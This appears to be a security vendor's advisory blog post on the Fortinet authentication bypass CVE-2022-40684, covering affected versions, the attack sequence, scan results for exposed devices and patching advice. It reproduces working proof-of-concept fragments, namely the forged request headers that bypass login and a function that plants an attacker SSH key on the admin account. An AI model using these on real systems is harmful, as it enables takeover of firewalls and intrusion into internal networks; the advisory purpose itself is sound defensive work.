On Oct. 7, 2022, less than a month after the ProxyNotshell attack that used MS Exchange Server Zero-Day vulnerability, Fortinet authentication bypass vulnerability CVE-2022-40684 was discovered. This vulnerability is threatening users of Fortinet products like Fortigate, Fortiproxy and Fortiswitch Manager. It is especially prevalent in products being ran on version Firmware 7.x. 

This article discusses the analysis of Fortient authentication bypass vulnerability which along with Palo Alto, is used by 565,000 customers around the world and explains how you can check for Fortinet products that are exposed on the internet. 

CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Latest Updates

The authentication bypass vulnerability was disclosed to customers on October 7th and was soon known to everyone else through several reports. On Oct. 10, a list of all affected Fortinet products and solutions were released to everyone.

Vulnerable Products 

Fortinet FortiOS Version 7.2.0 ~ 7.2.1 and 7.0.0 ~ 7.0.6, Fortinet FortiProxy Version 7.2.0 ~ 7.0.6 and FortiSwitch Manager Version 7.2.0 and 7.0.0

  • FortiOS: version 5.x, 6.x are not affected  

According to the announcement, hackers were able to gain information about user, user’s public ssh-key, trusthostzone band IP, fortitoken, serial number, FortiOS and more through HTTP/HTTPS requests of the version of products. In addition to the attack, they can also access the product’s CLI by sending the RSA key to the server and hijacking the admin user’s ssh key. If they suceed in doing so, they can penetrate the internal network as they have the power to manipulate the management interface. 

Order of Attack

  1. Modify the admin user’s SSH key to their own key so they can log in when they acquire a vulnerable server 
  2. Add local user 
  3. Access interface and update networking configurations 
  4. Leak other confidential system information through packet capture and inferface management pages 

Fortinet said to verify systems immediately. If you find the ‘user= “Local_Process_Access” log when logging in, it is telling you to patch and take action immediately. 

Detect Vulnerable Fortinet Using PoC Code

You can find vulnerable Fortinet servers by making a HTTP/HTTPS request on ‘api/v2/cmdb/system/admin’ and checking if the system information has been leaked. 

Deliver the header below to bypass authentication. 

CVE-2022-40684 PoC Code: https://github.com/carlosevieira/CVE-2022-40684

headers = {
    "user-agent": "Node.js",
    "accept-encoding": "gzip, deflate",
    "Host": "127.0.0.1:9980",
    "forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
    "x-forwarded-vdom": "root",  
}

If you happen to find a vulnerable server, you can gain access rights by delivering the key to its header and through ssh authentication bypass.

CVE-2022-40684 PoC Code: https://github.com/horizon3ai/CVE-2022-40684

def add_key(target, username, key_file):
    key = format_key(key_file)
    j = {
        "ssh-public-key1": '\"' + key + '\"'
        }
    url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
    r = requests.put(url, headers=HEADERS, json=j, verify=False)
    if 'SSH key is good' not in r.text:
        print(f'[-] {target} is not vulnerable!')
    else:
        print(f'[+] SSH key for {username} added successfully!')

If you request for HTTP/HTTPS at a open Fortinet IP address using the PoC code, you can confirm whether or not the server is vulnerable. 

Operating Fortinet Firewall Neglected, Immediate Insepctions Are Needed 

We checked the vulnerabilities of certain Fortinet IPs that have been exposed on the internet through released PoC. 

As shown in the image below, we can see that the username, user rights (read-only, super_admin) and the SSH public key has been exposed.

The vulnerable firmware version is the 7.2.0 version so we know that the product Fortigate 100E is being used. 

CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet
CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet

As we can see below, the admin’s SSH public key is listed as fake-key. From this, we can assume that this is a server affected by Fortinet authentication bypass vulnerability. 

 CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet
 CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet

If you search for the IP address of the server on Criminal IP asset search, you can see that it is an IP address owned by Microsoft. (as_name: MICROSOFT-CORP-MSN-AS-BLOCK)

Criminal IP Search Result of Server Affected by CVE-2022-40684 Fortinet Authentication Bypass Vulnerability
Criminal IP Search Result of Server Affected by CVE-2022-40684 Fortinet Authentication Bypass Vulnerability
CVE-2022-40684 Fortinet 인증우회 취약점 피해 서버의 Criminal IP 조회 결과
Criminal IP Search Result of Server Affected by CVE-2022-40684 Fortinet Authentication Bypass Vulnerability

CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Security Check  

CVE-2022-40684 Fortinet authentication bypass vulnerability received a CVSS v3 score of 9.8. Despite Fortinet’s vulnerability patch recommendations, there are still many servers around the world that are operating a vulnerable firewall. 
This vulnerability can access firewall CLI through authentication bypass. Therefore, not only is it dangerous for operating external servers but also for servers operating internally. It is highly recommended and considered important to conduct security updates. If the OS version update is difficult, limit IP access to HTTP/HTTPS interface or deactivate the interface itself.

Check out our article from last month that discusses how to detect and analyze exposed servers by MS Exchange Zero-Day Vulnerability.


Source : Criminal IP (https://www.criminalip.io)

Releated Article :